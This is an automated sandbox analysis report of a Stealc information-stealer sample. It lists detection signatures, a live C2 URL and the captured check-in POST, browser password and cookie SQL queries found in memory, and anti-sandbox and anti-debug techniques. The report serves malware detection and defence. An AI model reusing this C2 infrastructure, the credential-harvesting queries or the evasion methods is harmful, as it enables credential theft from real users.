
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1528316
MD5: e65a390d1393c0f3cba1b5bfd5bff188
SHA1: bc716b7d8d95ffc9eb04dd36e63fc829dc51f3fa
SHA256: 4911b53e223f5d5d5781b45599cad59b5b2e6d82e03bcd33c7d72f6df95f7488
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7828 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E65A390D1393C0F3CBA1B5BFD5BFF188)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings whose development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches

Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000001.00000002.1472692554.00000000015AE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000001.00000003.1416396834.0000000005200000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7828 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7828 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
1.2.file.exe.850000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-07T19:14:13.177285+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49706 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 1.2.file.exe.850000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0085C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 1_2_0085C820
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00859AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 1_2_00859AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00857240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 1_2_00857240
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00859B60 CryptUnprotectData,LocalAlloc,LocalFree | 1_2_00859B60
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00868EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 1_2_00868EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 1_2_008638B0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00864910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 1_2_00864910
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0085DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 1_2_0085DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0085E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 1_2_0085E430
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0085ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 1_2_0085ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00864570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 1_2_00864570
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00863EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 1_2_00863EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0085F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 1_2_0085F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 1_2_008516D0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0085DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 1_2_0085DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0085BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 1_2_0085BE70

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49706 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFB
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 35 36 32 38 41 30 32 39 38 46 32 39 36 33 34 39 35 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 2d 2d 0d 0a
    Data Ascii (multipart body, CRLF line breaks restored from the raw bytes):
    ------IEHIIIJDAAAAAAKECBFB
    Content-Disposition: form-data; name="hwid"

    AE5628A0298F2963495975
    ------IEHIIIJDAAAAAAKECBFB
    Content-Disposition: form-data; name="build"

    doma
    ------IEHIIIJDAAAAAAKECBFB--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (7 occurrences)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00856280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 1_2_00856280
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 (no User-Agent header; same request as shown above under global traffic)
    Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFB
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: file.exe, 00000001.00000002.1472692554.00000000015AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1472692554.0000000001625000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php5
Source: file.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpW
Source: file.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpYG
Source: file.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phps
Source: file.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000001.00000002.1472692554.00000000015AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.3793

System Summary

Source: file.exe | Static PE information: section name: (special characters, not rendered)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (special characters, not rendered)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B3B8CC
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2982C
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C22A04
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00AF1A76
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C123C5
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B103EF
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2B3AF
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C244E7
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C27C24
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B05DF2
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B2C6CF
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00AF7624
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B7560E
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2D7C0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C20F06
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 008545C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: edqomgnb ZLIB complexity 0.9947850689269747
Source: file.exe, 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000001.00000003.1416396834.0000000005200000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00868680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle | 1_2_00868680
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00863720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 1_2_00863720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\6HZJYDZL.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000001.00000002.1472692554.00000000015AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT origin_url, username_value, password_value FROM logins;R,
Source: file.exe, 00000001.00000002.1472692554.00000000015AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1873920 > 1048576
Source: file.exe | Static PE information: Raw size of edqomgnb is bigger than: 0x100000 < 0x1a3600

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 1.2.file.exe.850000.0.unpack :EW;.rsrc :W;.idata :W; :EW;edqomgnb:EW;cxwgayag:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;edqomgnb:EW;cxwgayag:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00869860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 1_2_00869860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1d06a1 should be: 0x1ca4aa
Source: file.exe | Static PE information: section name: (special characters, not rendered)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (special characters, not rendered)
Source: file.exe | Static PE information: section name: edqomgnb
Source: file.exe | Static PE information: section name: cxwgayag
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EFB0E9 push esi; mov dword ptr [esp], 4F955FE5h | 1_2_00EFB107
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EFB0E9 push 0561171Fh; mov dword ptr [esp], edx | 1_2_00EFB13E
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CB18EC push ebp; mov dword ptr [esp], edx | 1_2_00CB192F
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00CB18EC push eax; mov dword ptr [esp], ebx | 1_2_00CB19A2
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C978E4 push ebp; mov dword ptr [esp], 7E418912h | 1_2_00C9790E
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B4C0FF push 5B7DCAC0h; mov dword ptr [esp], ebx | 1_2_00B4C1B8
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00B4C0FF push ecx; mov dword ptr [esp], edx | 1_2_00B4C1D2
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push 17BC7CC8h; mov dword ptr [esp], ebx | 1_2_00C26097
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push edi; mov dword ptr [esp], esi | 1_2_00C260D0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push 5AE59800h; mov dword ptr [esp], edi | 1_2_00C26133
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push ebx; mov dword ptr [esp], esi | 1_2_00C26137
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push 53FBE0B8h; mov dword ptr [esp], edi | 1_2_00C26168
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push 0875B4EBh; mov dword ptr [esp], ecx | 1_2_00C26346
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push eax; mov dword ptr [esp], edi | 1_2_00C263D4
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push edx; mov dword ptr [esp], 3BF65F38h | 1_2_00C26413
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push 3AD9833Ch; mov dword ptr [esp], edx | 1_2_00C2644F
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push ebx; mov dword ptr [esp], 37DDFDBEh | 1_2_00C26471
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push 47229E63h; mov dword ptr [esp], ebx | 1_2_00C264C1
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push ebx; mov dword ptr [esp], eax | 1_2_00C264ED
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push ebx; mov dword ptr [esp], ebp | 1_2_00C26552
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push 5035BFF1h; mov dword ptr [esp], esp | 1_2_00C26630
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push 43ACD927h; mov dword ptr [esp], edx | 1_2_00C2664F
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push eax; mov dword ptr [esp], 62DBFDDCh | 1_2_00C2666C
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push 6F65AFE4h; mov dword ptr [esp], edx | 1_2_00C2667B
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push 61C1CD9Ah; mov dword ptr [esp], ebx | 1_2_00C26710
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push eax; mov dword ptr [esp], edi | 1_2_00C26760
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push esi; mov dword ptr [esp], 1BCAF8BCh | 1_2_00C267DB
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push esi; mov dword ptr [esp], eax | 1_2_00C267F2
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push edi; mov dword ptr [esp], eax | 1_2_00C2693C
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push 102AAC7Fh; mov dword ptr [esp], ecx | 1_2_00C2699A
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00C2608E push edx; mov dword ptr [esp], ebp | 1_2_00C26A00
Source: file.exe | Static PE information: section name: edqomgnb entropy: 7.953527628091509

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00869860 (GetProcAddress/LoadLibraryA import-resolution chain; same function as listed under Data Obfuscation)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_1-13698
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB1FC1 second address: AB1FC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C2C8CD second address: C2C8DB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F68950EC3B8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C30F37 second address: C30F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C31390 second address: C31394 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C31394 second address: C313A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F68950E7986h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C35129 second address: C35167 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F68950EC3B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e jmp 00007F68950EC3C0h 0x00000013 pop ebx 0x00000014 push edi 0x00000015 jmp 00007F68950EC3C2h 0x0000001a pop edi 0x0000001b popad 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 pop edi 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C35167 second address: C3516D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3516D second address: C35177 instructions: 0x00000000 rdtsc 0x00000002 je 00007F68950EC3BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C351CA second address: C35210 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnl 00007F68950E7986h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d ja 00007F68950E7990h 0x00000013 nop 0x00000014 pushad 0x00000015 add bx, 2022h 0x0000001a mov ax, si 0x0000001d popad 0x0000001e add cx, 835Ch 0x00000023 push 00000000h 0x00000025 mov dword ptr [ebp+122D2874h], esi 0x0000002b push C42FAFFCh 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 jns 00007F68950E7986h 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C35210 second address: C35285 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F68950EC3C8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d add dword ptr [esp], 3BD05084h 0x00000014 sub dx, A802h 0x00000019 push 00000003h 0x0000001b mov edx, dword ptr [ebp+122D3485h] 0x00000021 push 00000000h 0x00000023 mov dl, al 0x00000025 mov dword ptr [ebp+122D3043h], esi 0x0000002b push 00000003h 0x0000002d jmp 00007F68950EC3C8h 0x00000032 push D734D59Dh 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F68950EC3C4h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C35285 second address: C3528B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3528B second address: C35290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C35290 second address: C35302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F68950E7986h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 1734D59Dh 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F68950E7988h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e lea ebx, dword ptr [ebp+12457060h] 0x00000034 call 00007F68950E798Eh 0x00000039 mov dword ptr [ebp+122D2370h], edx 0x0000003f pop edx 0x00000040 sbb esi, 2BD94603h 0x00000046 xchg eax, ebx 0x00000047 jmp 00007F68950E798Bh 0x0000004c push eax 0x0000004d push esi 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F68950E798Ch 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C353D2 second address: C353D7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
